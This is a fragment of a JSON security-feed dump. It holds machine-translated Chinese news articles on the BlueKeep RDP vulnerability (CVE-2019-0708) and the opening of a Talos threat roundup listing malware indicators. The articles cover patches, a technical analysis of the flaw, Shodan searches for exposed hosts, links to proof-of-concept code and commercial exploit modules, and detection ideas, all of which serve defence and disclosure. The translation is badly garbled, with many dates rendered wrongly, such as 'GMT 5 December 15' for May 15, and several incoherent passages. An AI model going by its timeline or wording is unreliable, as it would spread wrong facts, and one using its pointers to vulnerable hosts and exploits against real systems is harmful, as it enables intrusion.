warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-09-07T10:43:36", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "9 \u6708 7 Morning, open your eyes, the continuous rain of Shanghai has finally cleared up, the circle of friends was the\u201cstorm\u201d--the one known as wannacry level of vulnerability BlueKeep\uff08CVE-2019-0708\uff09exploit released. \n! [](/Article/UploadPic/2019-9/20199714522870. png) \nMetasploit on the blog and Twitter, in succession to publish news that Metasploit formal integration for CVE-2019-0708, also known as the BlueKeep the Exploit module, although at present the initial version applies only to the 64-bit version of Windows 7 and Windows 2008 R2, but also the release of a threat signal, no potential attacker has already begun to pay attention to this information, along with the subsequent module updates, BlueKeep the vulnerability of the power is also gradually revealed. \n! [](/Article/UploadPic/2019-9/20199714522398. png) \nCurrently have noticed a lot of security personnel or the laboratory has conducted a vulnerability reproduced, further confirmed the EXP availability. Note that the EXP is easy to cause the system to blue screen caused by a system interruption in service. Recommendations of the red team, etc. before the test, the evaluation system degree of importance, caution. \nOn BlueKeep\uff08CVE-2019-0708\uff09 \nGMT 5 December 15, Microsoft released for Remote Desktop Services remote code execution vulnerability CVE-2019-0708 fixes, the vulnerability is triggered without user interaction. This also means that an attacker can use the vulnerability to make similar to 2017 swept the world of WannaCry class of worm virus, large-scale spread and destruction. \nRemote Desktop Services formerly known as Terminal Services in remote code execution vulnerability exists when an unauthenticated attackers use RDP to connect to the target system and send a specially crafted request. Successful exploitation of this vulnerability an attacker can be on the target system execute arbitrary code. The attacker could then install programs; view, change, or delete data; or create full user permissions to the new account. To exploit this vulnerability, an attacker would only need to via RDP to the target system the Remote Desktop service send a malicious request. \nThis vulnerability timeline: \nOf 1, 2019, 5 November 14 \nMicrosoft released Remote Desktop Services remote code execution vulnerability CVE-2019-0708 safety notices and the corresponding patch, and especially for this vulnerability released specifically described, suggesting this is a possible cause worms the spread of serious vulnerability \nThe 2, 2019 5 May 15, \nBucket like the smart security platform release vulnerability early warning information and disposal program, then the bucket like a smart security platform for the ARS/PRS on line vulnerability detection tool \n3, the 2019 5 May 23, \nInternet open channels with non-destructive vulnerability scanning function of the PoC program \nA 4, 2019 5 May 25, \nHack start large-scale scanning vulnerable devices \n5, the 2019 5 May 30, \nMicrosoft again released for CVE-2019-0708 vulnerability to do to patch alert, based on the vulnerability severity is strongly recommended that users upgrade as soon as possible to repair \n6, the 2019 Year 5 July 31, \nInternet open sources appear to cause the blue screen of PoC code, fighting like a security emergency response team has confirmed the PoC code availability \n7, the 2019 Year 6 on 8 May \nMetasploit the commercial version Start provide can lead to remote code execution Exploit module \n8, the 2019 Year 7 on 31 December \nCommercial exploit kits Canvas added CVE-2019-0708 Exploit module \n9, the 2019 Year 9 month 7 day \nThere have been open channels of the Metasploit CVE-2019-0708 Exploit module released, constitute a real worm threats. \nVulnerability Hazard \nSuccessful exploitation of this vulnerability an attacker can be on the target system execute arbitrary code. The attacker could then install programs; view, change, or delete data; or create full user permissions to the new account. \nThe scope of the impact \nProduct \nWindows [operating systems](<http://www.myhack58.com/Article/48/Article_048_1.htm>) \nVersion \nWindows 7 \nWindows Server 2008 R2 \nWindows Server 2008 \nWindows Server 2003 has stopped maintenance \nWindows XP has stopped maintenance \nAssembly \nRemote Desktop Services \nSolution \nOfficial patch \nThrough the Windows [operating system](<http://www.myhack58.com/Article/48/Article_048_1.htm>)in the Automatic Update feature to be updated \nFor the system version of the reference at the end of the list to download the patch to run the installation \nTemporary solution recommendations \n1, disable remote desktop services \n2, in the firewall for Remote Desktop Services port(3389)is blocked \n3, in Windows 7, Windows Server 2008, and Windows Server 2008 R2-enable network authentication \nReference \nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708 \nhttps://github.com/rapid7/metasploit-framework/pull/12283?from=timeline&amp;isappinstalled=0 \nOfficial patch download \n[Operating system](<http://www.myhack58.com/Article/48/Article_048_1.htm>)version \nPatch download link \nWindows 7 x86 \nhttp://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x86_6f1319c32d5bc4caf2058ae8ff40789ab10bf41b.msu \nWindows 7 x64 \nhttp://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x64_3704acfff45ddf163d8049683d5a3b75e49b58cb.msu \nWindows Embedded Standard 7 for x64 \nhttp://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x64_3704acfff45ddf163d8049683d5a3b75e49b58cb.msu \nWindows Embedded Standard 7 for x86 \nhttp://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x86_6f1319c32d5bc4caf2058ae8ff40789ab10bf41b.msu \nWindows Server 2008 x64 \nhttp://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.0-kb4499149-x64_9236b098f7cea864f7638e7d4b77aa8f81f70fd6.msu \nWindows Server 2008 Itanium \nhttp://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.0-kb4499180-ia64_805e448d48ab8b1401377ab9845f39e1cae836d4.msu \nWindows Server 2008 x86 \nhttp://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.0-kb4499149-x86_832cf179b302b861c83f2a92acc5e2a152405377.msu \nWindows Server 2008 R2 Itanium \n\n\n**[1] [[2]](<95881_2.htm>) [next](<95881_2.htm>)**\n", "edition": 1, "modified": "2019-09-07T00:00:00", "published": "2019-09-07T00:00:00", "id": "MYHACK58:62201995881", "href": "http://www.myhack58.com/Article/html/3/62/2019/95881.htm", "title": "Worms level vulnerability BlueKeep(CVE-2019-0708) EXP is released-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-15T15:21:14", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "2019 5 May 14, Microsoft officially released security patches, repair the Windows Remote Desktop service remote code execution vulnerability, the vulnerability affects some older versions of Windows system. This vulnerability is pre-authentication and without user interaction, this means that this vulnerability by the network worm's way is utilized. Using this vulnerability, any malicious software are possible from the infected computer to spread to other vulnerable computers, in a manner and 2017 WannaCry malware spread in a similar way. \nThrough the assessment, the 360-CERT confirmed the vulnerability severity, and recommends users immediately patch update process. \n\n0x01 affect the scope of the \nWindows 7 \nWindows Server 2008 R2 \nWindows Server 2008 \nWindows 2003 \nWindows XP \nWindows 8 and Windows 10 and later version users are not affected by this vulnerability. \n\n0x02 repair recommendations \nThrough the installation of 360 security guards ( http://weishi.360.cn/ )for a key update \nFor Windows 7 and Windows Server 2008 users, timely installation of Windows security updates that were released \nFor Windows 2003 and Windows XP users, to update system version \nInterim hazard mitigation measures: \nOpen the network authentication NLA\uff09 \n\n0x03 timeline \n2019-05-14 the official Microsoft Security Bulletin \n2019-05-15 360CERT warning \n\n0x04 reference links \nhttps://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/ \nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708 \n\n", "edition": 1, "modified": "2019-05-15T00:00:00", "published": "2019-05-15T00:00:00", "id": "MYHACK58:62201994152", "href": "http://www.myhack58.com/Article/html/3/62/2019/94152.htm", "title": "CVE-2019-0708: Windows RDP service worms level vulnerability alerts-a vulnerability alert-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-15T15:21:12", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "In WannaCry two-year anniversary, Windows is again exposed to the presence of high-risk remote vulnerability. 5 on 15 May, Microsoft official released the 5, on security update patches a total fix 82 vulnerabilities, which contains for Remote Desktop RDP services remote code execution vulnerability CVE-2019-0708 the. \n! [](/Article/UploadPic/2019-5/201951519518699.jpg) \nAccording to the Microsoft Security Response Center MSRC published a blog post, the Remote Desktop Protocol RDP in itself is not easy to receive the attack, this vulnerability is pre-authentication, without user interaction. This means that the use of this vulnerability and any future malicious software are possible with the 2017 WannaCry malicious software all over the world in a similar manner, from vulnerable computers to spread to other computers. \nTo exploit the vulnerability, an attacker could install programs, view, change, or delete data, or create with full user permissions to the new account. This vulnerability exists temptation imaginable, as long as the POC release, it is possible to in the most people did not have time to update the case of the repetition of WannaCry it. \nBut so far, also did not find any malicious behavior exploit this vulnerability, GitHub appears on many take advantage of this message lie Star, fishing or prank. \n! [](/Article/UploadPic/2019-5/201951519518174. png) \nYou think is an exploit...... \n! [](/Article/UploadPic/2019-5/201951519518566. png) \nJust wanted to tell you: Never Gonna Give You Up. \nCVE-2019-0708 vulnerability scope: \nWindows 7 \nWindows Server 2008 R2 \nWindows Server 2008 \nWindows Server 2003 has stopped maintenance \nWindows XP has stopped maintenance \nIn addition to Win8, Win 10 with almost all Windows versions are affected by this vulnerability. Although Microsoft has stopped the Windows 2003 and Windows XP support, but due to this vulnerability the degree of harm is high, Microsoft the repair patch covering all of the affected versions of Windows. \nSafety recommendations \n1. Temporary coping methods \nIn the affected versions of the system enable network level authentication, NLA; to enable NLA, the attacker needs to use on the target system to a valid account on the Remote Desktop Services authentication, to successfully exploit the vulnerability. \nMicrosoft's official recommendation, regardless of whether to open the NLA, should be updated as soon as possible, the complete elimination of the vulnerability. \n2. Security patches \nSince Win8 and Win 10 is not affected by CVE-2019-0708 vulnerability, so these users can be assured. For Win 7 and Server 2008 users, you can directly through the system automatically updates the installed vulnerability patches. If you have already closed the system automatically updates, can from the following links to download the corresponding version of the patch installation: \nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708 \nFor Windows 2003 and Windows XP users, since the official has stopped support, not through auto update install the patch, you need to manually through the following address to download the security patches self install 360 security guards users can through the\u201cloophole repair\u201dfunction of the shortcut to install the patch: the \nhttps://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708 \n\n\n", "edition": 1, "modified": "2019-05-15T00:00:00", "published": "2019-05-15T00:00:00", "id": "MYHACK58:62201994162", "href": "http://www.myhack58.com/Article/html/3/62/2019/94162.htm", "title": "Windows re-aeration\u201cWannaCry\u201dlevel vulnerability CVE-2019-0708, cures XP, Win7-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-22T17:19:40", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "! [](/Article/UploadPic/2019-5/201952221409502. png) \n\nWrite in front of words \nAt Microsoft in May this year of the vulnerability Update Security Bulletin, reference was made to a Remote Desktop Protocol RDP for vulnerabilities. The reason we're here specifically for this vulnerability analysis, is because of this vulnerability the update relates to Windows XP and other Windows operating system, and it is well known, Windows XP has been for many years without ever updating. So why is Microsoft this time to fix for this high-risk vulnerability? Don't worry, we now take a look! \nAccording to Microsoft released security Bulletin, this is a very strict certification of security vulnerability, it will cause the attacker on the target device to achieve remote code execution, and implanted worms and other malicious software. This also means that, once the target tissue which are infected, the entire network system to the other is not subject to the security protection of computer equipment will also be\u201cspared\u201dof. In this security Bulletin, Microsoft mentioned the famous Internet Worm\u201cWannaCry\u201din. In 2017 in March, the Microsoft fix for the malware-related vulnerabilities MS17-010, but prior to that, many attackers are using\u201cWannaCry\u201dfor network attacks. \nIn view of the vulnerability of the security threat level high risk vulnerability, the attacker is likely to be in this period of time to develop the appropriate exploits to use the tool, the McAfee Advanced Threat Research team but also on the vulnerability and associated threat scenarios conducted in-depth analysis, we recommend that the majority of users as soon as possible to fix vulnerabilities CVE-2019-0708 the. \n\nAffected[OS](<http://www.myhack58.com/Article/48/Article_048_1.htm>) \nWindows 2003Windows XP 7Windows Server 2008Windows Server 2008 R2 \n\nThe RDP Protocol \nRemote Desktop Protocol RDP, Remote Desktop Protocol is a multi-channel multi-channel Protocol can help users, client, or\u201clocal computer\u201dwith the Microsoft Terminal Services Computer, the server or the\u201cremote computer\u201dthe establishment of a communication connection. Currently, the market most of the Windows are installed with Remote Desktop Protocol. Other[operating system](<http://www.myhack58.com/Article/48/Article_048_1.htm>)is also related to client software, such as Linux, FreeBSD, and Mac OS X, and so on. The Protocol is the International Telecommunication Union published an international standard multi-channel conferencing Protocol T. 120 is an extension. The RDP Protocol in Terminal Services after the launch there have been four versions, namely 4. Of 0, 5.0, and 5.1, and 5.2 in. In General, the version according to the version of windows determined. From the client's point of view, 5. X version provide the functionality the difference is not very large, relative to the 4. 0 version which provides a user with a password and log in directly, the client driver resource mapping, and client audio playback, up to 24-bit color display and FIPS compliant encryption level of the connection. In addition, from 4. 0 Protocol began to become available customers a carbonyl function are: high, medium, low three kinds of the data encryption level, the client to customize the initial login environment, the client printer mapping, client LPT port mapping client com port mapping, clipboard mapping, customer login, personalized settings(including the keyboard, display screen size, etc.). Version 7.0: this is the latest version, only support Windows Server 2008 R2 or Windows 7 and above versions. \n\nVulnerability overview \nA worm virus can infected the network within the system to self-replicate and spread, and the infected on the remote host to run automatically, without requiring the user to any additional interaction. If a malicious software is the main attack vector is the network, then it should be classified as worms. \nRemote Desktop Protocol RDP to define the communication between the two sides in a virtual channel between the data communication mode, to support the client to establish point to point connections. This virtual channel is a bidirectional data channel can be extended RDP function. Windows Server 2000 in RDP v5. 1 defines 32 types of static virtual channel\uff08SVC\uff09, but due to the which involved also to a large number of dynamic virtual channel DVC, so the available number of channels and types will be subject to certain restrictions. SVC is in the beginning of the session created in the session before the termination remain the same, but DVC is different, because it is according to the user needs to create and delete. \n\nVulnerability analysis \nVulnerability CVE-2019-0708 related to the RDP drive with. sys in _IcaBindVirtualChannels and _IcaRebindVirtualChannels it. We can see from the following figure to see the system initialize the RDP connection sequence, and security mechanisms to enable completion before the channel is established, this leads to a vulnerability, CVE-2019-0708 the can of worms, because it can be done by opening port 3389 in the destination within the network system to achieve self-replication and propagation. \n! [](/Article/UploadPic/2019-5/201952221409676. png) \nFirst give you a brief introduction\u201cMS_T120\u201dthis static virtual channel, which the RDP channel number is 31, in the GCC session initiation sequence. This is a Microsoft internal use of the channel name, and the client through a SVC to a request to establish connection, does not display on the\u201cMS_T120\u201dthis use of the channel information. \nThe following figure shows the GCC of the session Initialization Sequence of the channel request information, we can see which does not relate to any on MS_T120 channel information. \n! [](/Article/UploadPic/2019-5/201952221409844. png) \nBut in the GCC session initialization process, the client provides the channel name is not on the server side white list, so an attacker will be able to set another one named\u201cMS_T120\u201dSVC channel rather than before the number to 31 of the legitimate channel to make the target system heap memory corruption, or to achieve remote code execution. \nThe following figure shows the GCC of the session initialization process of the abnormal channel request\u201cMS_T120\u201dchannel number 4: the \n! [](/Article/UploadPic/2019-5/2019522214010337. png) \nMS_T120 channel management relates to the Assembly, we in the following figure for the label. MS_T120 the reference channel will be in the rdpwsx. the dll is created, the heap memory will be in rdpwp. sys allocated memory pool. When MS_T120 the reference channel in the channel number of the non-31 of the scenario is established, it will happen heap memory crash. \n! [](/Article/UploadPic/2019-5/2019522214010223. png) \nThe following figure shows the Microsoft of the vulnerability fix the situation, Microsoft in with. sys _IcaBindVirtualChannels and _IcaRebindVirtualChannels function in the client connection request section for the channel name\u201cMS_T120\u201ddetection code, and to ensure that the channel with the channel sequence 31 for binding. \n\n\n**[1] [[2]](<94234_2.htm>) [next](<94234_2.htm>)**\n", "edition": 1, "modified": "2019-05-22T00:00:00", "published": "2019-05-22T00:00:00", "id": "MYHACK58:62201994234", "href": "http://www.myhack58.com/Article/html/3/62/2019/94234.htm", "title": "Together we analyze this just to fix the RDP vulnerability, CVE-2019-0708-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-24T21:28:59", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "Recently, with the CVE-2019-0708 vulnerability of the publication, most of the security community will be the loopholes as the highest priority to addressing the vulnerability. Mentioned bug fixes, it is difficult not to associate this front WannaCry and NotPetya disastrous consequences. And according to the previous experience, we know very well, the user often does not immediately fix the vulnerability, but requires a relatively long period of time. Therefore, for this high-risk vulnerabilities, we need to quickly develop the vulnerability detection rules. \nAbout CVE-2019-0708 vulnerability, there is a more critical but very important details of the vulnerability with the Remote Desktop Services Remote Desktop Services is about, which is on Windows by the Microsoft implementation of the Remote Desktop Protocol RDP to. The RDP Protocol itself is not a problem, I have to mention this, in order to avoid the recurrence of like WannaCry during the outbreak we see those hype. \n\u201cBlueKeep\u201dlabel initially by Kevin Beaumount use. The reason why I choose this label, there are two reasons: in order to obtain the reference information, at the same time be able to on Twitter to find relevant posts, we can't simply use CVE as a label unless you remove the dash on. BlueKeep this tag just makes tweeting easier. \n! [](/Article/UploadPic/2019-5/201952513833498. png) \nVulnerability impact analysis \nTo establish detection theory, we must consider two threat models, namely: \n1\\. Worm threat, similar to the WannaCry scene. \n2\\. APT attacker, the vulnerability as a more complex attack part, like the Eternal Blue EternalBlue and the SMB Protocol is only NotPetya catastrophic attack. \nIn order to identify the presence of risk assets, we will refer to by the Dragon provided the following table: \n! [](/Article/UploadPic/2019-5/201952513833958. png) \nCVE-2019-0708 can be used similar to WannaCry the large-scale initial visit? We quickly see the Shodan data, found on the network the presence of a large number of hosts, exposing 3389 port, and may run a vulnerable version of Windows. \n\nSearch the contents of the URL as follows: \n\u00b7 https://www.shodan.io/search?query=port%3A3389+os%3A%22Windows+7+or+8%22 \n\u00b7 https://www.shodan.io/search?query=port%3A3389+2003 \n\u00b7 https://www.shodan.io/search?query=port%3A3389+2008 \n\u00b7 https://www.shodan.io/search?query=port%3A3389+os%3A%22Windows+XP%22 \nOverall, we can look for on the Internet expose RDP of 238. 5 million hosts, but it is not possible to verify this conclusion accuracy. \n! [](/Article/UploadPic/2019-5/201952513839135. png) \nSearch the contents of the URL as follows: https://www.shodan.io/search?query=Remote+Desktop+Protocol \nCited 2017 4 May 23, Dan Tentler's tweets,\u201cnot all hosts are Windows, and not all of these ports are SMB\u201din. We will this sentence into today like can be used,\u201cnot all of which 230 million hosts are Windows, and not all of these ports are vulnerable to CVE-2019-0708 affect of Service\u201d. If we apply the CVE-2019-0708 with WannaCry timeline comparison, we are now in MS-17010 has been released of the stage, but the Eternal Blue EternalBlue have not yet appeared, and therefore we are unable to scan to the next DoublePulsar it. Until such a PoC, we also cannot completely determine things direction of development. However, even if the threat arrives before WannaCry stage, we may also also will have 30 days to implement the defense, of course, this time might be less. \n! [](/Article/UploadPic/2019-5/201952513840966. png) \nAlthough we can discuss these audits to The whether the host can be an attacker of real use, and can analyze these host patch status, network segments, etc., but it is known that many companies are still running vulnerable versions of Windows, and the repair cycle for these systems may be more difficult. According to WannaCry of the data, we see that there are about 2. 4 million units more than the potential available hosts with 14 million units more than the suspected influence of the host, DoublePulsar before the event 3 weeks to be posted to the Internet. \nAt this stage, the greater the risk is within the organization using CVE-2019-0708 to the rapid fall of the host and lateral movement. And, since the exploit PoC in writing of the time has not yet appeared online as there are many fake, so we will use at our disposal all the tools to build the exploit before the detection. \nConsidering the above circumstances, as a defense, we can do three things: \n1\\. The deployment of active detection mode; \n2\\. Strictly required to fix the vulnerability or mitigate vulnerability risks; \n3\\. Reference to trusted researchers opinion, the tracking of the risk of the subsequent development. \nIn order to specifically explain this, I quote here Florian Roth's tweets: \n! [](/Article/UploadPic/2019-5/201952513840151. png) \nSpot fire: Sigma rules \nThe first rule, we referred to as Sigma #1, by Sigma GitHub Repo Markus the Neis provided, the rules for lateral movement of the technology T12010/remote service exploit https://attack.mitre.org/techniques/T1210/: the \n! [](/Article/UploadPic/2019-5/201952513841296. png) \nWithin an hour, similar to the rules of Sigma #2 by Roman Ranskyi in SOC Prime TDM on release, and provided to the community free use, the detection logic has been extended to the T1036/Masquerading https://attack.mitre.org/techniques/T1036/ and T1046/Web Services scanning https://attack.mitre.org/techniques/T1046/ the. \nBasically, we've got a TLP:WHITE and TLP:GREEN, and the catch in the loophole use before. However, this is enough to fully discover the aggressive behavior? \nFurther: machine learning \nNext, we explore machine learning how can provide us with some of the testing aspects of the advantages, but also to consider how Elastic the stack to create the solution. \nTheory: \nIn a defined time window, a host initiates a large number of RDP connections, and wherein the single target IP address too, can prove the suspect using the RDP Protocol as the propagation, worms of lateral movement and propagation. In the process, may be used with CVE-2019-0708 vulnerability related to the RDS vulnerability. \n\n\n**[1] [[2]](<94259_2.htm>) [[3]](<94259_3.htm>) [next](<94259_2.htm>)**\n", "edition": 1, "modified": "2019-05-25T00:00:00", "published": "2019-05-25T00:00:00", "id": "MYHACK58:62201994259", "href": "http://www.myhack58.com/Article/html/3/62/2019/94259.htm", "title": "CVE-2019-0708 vulnerability impact analysis and the use of a variety of rules to detect method-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-07-26T11:45:24", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "By 2019 05 on 15 August, Microsoft released 5 December patch update list, in which the presence of a marked to severe RDP Remote Desktop Services remote code execution vulnerability, an attacker can exploit this vulnerability remotely without user authentication by sending the special structure of the malicious data on the target system to execute malicious code, thereby acquiring the machine full control. \nFrom the patch analysis, vulnerability analysis, and then to the POC release, and then is EXP video release, time has passed 2 months+10 days. \nAnd this series also ushered in the first 4 rounds. \nFirst bullet: point Remote Desktop Services remote code execution vulnerability POC open \nThe second bomb: Remote Desktop Services vulnerability analysis and detection code is disclosed, the Dark Net has begun selling may be the use of EXP \nThird bullet: Microsoft re-notice: to remind you to update the system in order to prevent the worm \nBecause left to the user to patch the time has not much. in. \nSince last week see snow conference, from Tecent keenlab the gangster of the PPT occur in the network after. \n! [](/Article/UploadPic/2019-7/201972616547738. png) \n! [](/Article/UploadPic/2019-7/201972616547946.jpg) \nDownload: \nhttps://github.com/blackorbird/APT_REPORT/blob/master/exploit_report/%23bluekeep%20RDP%20from%20patch%20to%20remote%20code%20execution.pdf \nForeign security personnel suddenly opens up to disclose the EXP is constructed of a heat wave \n! [](/Article/UploadPic/2019-7/201972616548254. png) \n! [](/Article/UploadPic/2019-7/201972616548834.jpg) \nWhile U.S. companies Immunity, a company specializing in the sale of commercial penetration testing kit company, finally unable to bear it, resorted to the big move, the public Twitter huckster. \n! [](/Article/UploadPic/2019-7/201972616548106. png) \nWhile Canvas is one from Dave Aitel ImmunitySec the company's commercial vulnerability exploitation tool. It includes more than 370 EXP, it also comes with complete code, as well as some of the 0day vulnerability. \n\uff08PS: the main He than Metasploit commercial version is also cheap.\uff09 \nWherein the demonstration video below. \nhttps://vimeo.com/349688256/aecbf5cac5 \nVisible indeed weapons of the time. \nImmunity CANVAS BlueKeep module can achieve remote code execution \u2013 i.e., in the infected host to open a shell and execute the command. \n! [](/Article/UploadPic/2019-7/201972616548793.jpg) \nAlthough the CANVAS of the license cost in the thousands to tens of thousands of dollars between, but hackers already know how to pirated or legally purchased penetration testing tools, such as Cobalt Strike to. \nIt means that the world hackers may have been eyeing the CANVAS, upon which wealthy people purchase, resulting in a new version of the tool is compromised, waiting to give their will be a crack Holocaust. \nHowever, I still don't have money, the rich can start your show. \n! [](/Article/UploadPic/2019-7/201972616548518.jpg) \nhttps://www.immunityinc.com/products/canvas/ \nIn the Immunity of the BlueKeep the use of the module leak before the company and users still have time to repair the system. \nAs is well known, BlueeKeep affects Windows XP, Windows Vista, Windows 7, Windows Server 2003 and Windows Server 2008. \nSystem patch, and the mitigation and workarounds \u2013 see here. \nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708 \nWindows 10 version is not affected. \n\n", "edition": 1, "modified": "2019-07-26T00:00:00", "published": "2019-07-26T00:00:00", "id": "MYHACK58:62201995234", "href": "http://www.myhack58.com/Article/html/3/62/2019/95234.htm", "title": "Began openly selling a...the United States company is selling weapons of the BlueKeep the exploit-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-03T09:28:02", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "! [](/Article/UploadPic/2019-6/20196312454415. png) \n\n\n0x00 description \n2019 5 August 31, 360 is detected on github someone posted a lead to a remote denial of Service POC code(https://github.com/n1xbyte/CVE-2019-0708)and for windows server 2008 R2 x64 demo video, the proven POC code real and effective. An attacker can use to spread the code of the system to a remote denial-of-service attack or to modify the code to achieve remote code execution effect. \n! [](/Article/UploadPic/2019-6/20196312456581. png) \n\n0x01 safety recommendations \n1. Install 360 security guards a key update. \n2. To avoid the Remote Desktop Services RDP, the default port is 3389 exposed on the public Internet, such as for remote operation and maintenance convenient and indeed necessary to open, you can use VPN to log in to access, and close the 445 and 139, and 135 and other unnecessary ports. \n3. Use 360 provides RDP remote vulnerability Non-Destructive Testing Tool(https://free.360totalsecurity.com/CVE-2019-0708/detector_release.zip)internal and external network machine scan to detect and repair the loopholes in the machine. For the temporary can not be networked machine to use the 360 offline immunization tool(http://dl.360safe.com/leakfixer/360SysVulTerminator_CVE-2019-0708.exe)to detect the repair. \n\n", "edition": 1, "modified": "2019-06-03T00:00:00", "published": "2019-06-03T00:00:00", "id": "MYHACK58:62201994388", "href": "http://www.myhack58.com/Article/html/3/62/2019/94388.htm", "title": "Alert Windows RDP remote vulnerability POC propagation-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2019-10-11T17:29:31", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0708"], "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 4 and Oct. 11. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5da097d613262.txt>)that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness. \nThe most prevalent threats highlighted in this roundup are: \nThreat Name | Type | Description \n---|---|--- \nWin.Dropper.TrickBot-7288419-0 | Dropper | Trickbot is a banking trojan targeting sensitive information for select financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts. \nWin.Dropper.Qakbot-7287972-0 | Dropper | Qakbot, aka Qbot, has been around since at least 2008. Qbot primarily targets sensitive information like banking credentials but can also steal FTP credentials and spread across a network using SMB. \nWin.Trojan.Emotet-7287811-0 | Trojan | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Worm.Vobfus-7198158-0 | Worm | Vobfus is a worm that copies itself to external drives and attempts to gain automatic code execution via autorun.inf files. It also modifies the registry so that it will run when the system is booted. Once installed, it attempts to download follow-on malware from its command and control (C2) servers. \nWin.Dropper.Upatre-7196259-0 | Dropper | Upatre is a trojan that is often delivered through spam emails with malicious attachments or links. It is known to be a downloader and installer for other malware. \n \n* * *\n\n## Threat Breakdown\n\n### Win.Dropper.TrickBot-7288419-0\n\n#### Indicators of Compromise\n\nMutexes | Occurrences \n---|--- \n`Global\\316D1C7871E10` | 64 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`190[.]152[.]4[.]210` | 17 \n`37[.]228[.]117[.]146` | 9 \n`31[.]184[.]253[.]37` | 9 \n`181[.]113[.]20[.]186` | 6 \n`185[.]222[.]202[.]222` | 6 \n`51[.]68[.]247[.]62` | 5 \n`194[.]5[.]250[.]82` | 5 \n`51[.]254[.]69[.]244` | 5 \n`91[.]132[.]139[.]170` | 5 \n`116[.]203[.]16[.]95` | 4 \n`189[.]80[.]134[.]122` | 4 \n`203[.]23[.]128[.]168` | 4 \n`46[.]30[.]41[.]229` | 4 \n`37[.]44[.]212[.]216` | 4 \n`216[.]239[.]38[.]21` | 3 \n`185[.]248[.]87[.]88` | 3 \n`138[.]59[.]233[.]5` | 3 \n`190[.]154[.]203[.]218` | 3 \n`187[.]58[.]56[.]26` | 3 \n`177[.]103[.]240[.]149` | 3 \n`200[.]21[.]51[.]38` | 3 \n`5[.]230[.]22[.]40` | 3 \n`200[.]153[.]15[.]178` | 3 \n`198[.]27[.]74[.]146` | 2 \n`146[.]196[.]122[.]167` | 2 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 12 \n`ip[.]anysrc[.]net` | 4 \n`api[.]ip[.]sb` | 3 \n`ipinfo[.]io` | 3 \n`checkip[.]amazonaws[.]com` | 2 \n`wtfismyip[.]com` | 2 \n`api[.]ipify[.]org` | 2 \n`www[.]myexternalip[.]com` | 1 